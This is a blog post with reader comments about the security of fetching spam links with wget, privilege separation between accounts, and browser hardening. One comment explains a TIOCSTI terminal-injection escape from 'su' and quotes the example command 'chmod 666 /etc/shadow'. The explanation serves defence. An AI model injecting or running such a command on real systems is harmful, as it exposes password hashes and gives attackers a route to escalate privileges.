Archives

Categories

Hostile Web Sites

I was asked whether it would be safe to open a link in a spam message with wget. So here are some thoughts about wget security and web browser security in general.

Wget Overview

Some spam messages are designed to attack the recipient’s computer. They can exploit bugs in the MUA, applications that may be launched to process attachments (EG MS Office), or a web browser. Wget is a very simple command-line program to download web pages, it doesn’t attempt to interpret or display them.

As with any network facing software there is a possibility of exploitable bugs in wget. It is theoretically possible for an attacker to have a web server that detects the client and has attacks for multiple HTTP clients including wget.

In practice wget is a very simple program and simplicity makes security easier. A large portion of security flaws in web browsers are related to plugins such as flash, rendering the page for display on a GUI system, and javascript – features that wget lacks.

The Profit Motive

An attacker that aims to compromise online banking accounts probably isn’t going to bother developing or buying an exploit against wget. The number of potential victims is extremely low and the potential revenue benefit from improving attacks against other web browsers is going to be a lot larger than developing an attack on the small number of people who use wget. In fact the potential revenue increase of targeting the most common Linux web browsers (Iceweasel and Chromium) might still be lower than that of targeting Mac users.

However if the attacker doesn’t have a profit motive then this may not apply. There are people and organisations who have deliberately attacked sysadmins to gain access to servers (here is an article by Bruce Schneier about the attack on Hacking Team [1]). It is plausible that someone who is targeting a sysadmin could discover that they use wget and then launch a targeted attack against them. But such an attack won’t look like regular spam. For more information about targeted attacks Brian Krebs’ article about CEO scams is worth reading [2].

Privilege Separation

If you run wget in a regular Xterm in the same session you use for reading email etc then if there is an exploitable bug in wget then it can be used to access all of your secret data. But it is very easy to run wget from another account. You can run “ssh otheraccount@localhost” and then run the wget command so that it can’t attack you. Don’t run “su – otheraccount” as it is possible for a compromised program to escape from that.

I think that most Linux distributions have supported a “switch user” functionality in the X login system for a number of years. So you should be able to lock your session and then change to a session for another user to run potentially dangerous programs.

It is also possible to use a separate PC for online banking and other high value operations. A 10yo PC is more than adequate for such tasks so you could just use an old PC that has been replaced for regular use for online banking etc. You could boot it from a CD or DVD if you are particularly paranoid about attack.

Browser Features

Google Chrome has a feature to not run plugins unless specifically permitted. This requires a couple of extra mouse actions when watching a TV program on the Internet but prevents random web sites from using Flash and Java which are two of the most common vectors of attack. Chrome also has a feature to check a web site against a Google black list before connecting. When I was running a medium size mail server I often had to determine whether URLs being sent out by customers were legitimate or spam, if a user sent out a URL that’s on Google’s blacklist I would lock their account without doing any further checks.

Conclusion

I think that even among Linux users (who tend to be more careful about security than users of other OSs) using a separate PC and booting from a CD/DVD will generally be regarded as too much effort. Running a full featured web browser like Google Chrome and updating it whenever a new version is released will avoid most problems.

Using wget when you have to reason to be concerned is a possibility, but not only is it slightly inconvenient but it also often won’t download the content that you want (EG in the case of HTML frames).

7 comments to Hostile Web Sites

  • (is it) safe to open a link in a spam message with wget

    It may be just me, but the question seems as “not even wrong”. Curiosity and convenience tend to trump caution most of the time when it comes to people and computers. I’d like to believe that the golden rule that should be answered before doing anything is “what’s a compelling reason?”.

    Kudos for including the old reference to “Ihuntsysadmins” – though it seems rather dated given the current belief amongst intelligence agencies (including our own) – that any computer is a potentially useful access vector to information important to National security. i.e. I wouldn’t bet against wget (or curl) being targeted, certainly it’d seem prudent not to use them to access websites you believe to contain malware – on the same computer people store everything they hold important (and even when people “believe” there is nothing important on their computer).

    Regarding the important point you made about the use of Live CDs… perhaps that indicates a need for greater development of the Live CD project so that it becomes a much simpler affair to generate a limited version of your main computer as an up-to-date Live CD(?). If it was simpler for people to generate an up-to-date LiveCD that was as similar as possible to their usual desktop, included a password manager, their bookmarks, and Tor – and only took a few minutes to configure and build – perhaps it’d be used more often?

  • Another concern in opening links in spam is the fact that it informs the sender that you actually received and seen their spam. Most links I see these days have a unique ID in them that I’m sure is used to connect the specific link to the recipient. Hence just doing a HTTP requiest, even with wget, marks your email address as “confirmed” in the spammer’s list.

  • When I was running a medium size mail service where accounts were often hijacked by spammers I don’t recall seeing different URLs used in that way. In most cases the same URL was sent to many people. Admittedly that’s a very small sample of the spam that’s out there.

    For a long time the general advice was to never click on unsubscribe links or reply to spam to avoid confirming an address as being read by a human. I’m not sure that works so well nowadays. The cost of sending spam is so low that there’s no real incentive for them to stop spamming an address that doesn’t seem to respond.

    But you are correct to note that there are other potential problems than just compromising the local PC in accessing such links.

  • Diane Trout

    QubesOS has a nice implementation of another solution between use a different account and use a different machine.

    They have disposable VMs that automatically reset after the process ends

  • Scott: Sorry for the delay, your message went to the spam folder and I don’t check that very often. I disagree about the question being not even wrong, I think it’s a reasonable question. I agree that any computer can be a potential access vector, but sysadmin PCs would be treated differently by any well organised agency. Targeting a sysadmin has the potential to give greater results but more care would be required as unusual access patterns would tip the victim off.

    Making a LiveCD from a desktop installation is an interesting idea, but if you included bookmarks and passwords then there is potential for information leakage.

    Diane: That sounds a lot like the NSA NetTop project (which has Windows VMs on Linux).

  • Emanuel

    > Don’t run “su – otheraccount” as it is possible for a compromised program to escape from that.

    can you elaborate more about how it’s possible?

  • Emanuel: A hostile program can use the TIOCSTI ioctl to push characters in the keyboard buffer and then exit. For example it could put “chmod 666 /etc/shadow\n” into the keyboard buffer to be executed by the administrator shell if you run su from root.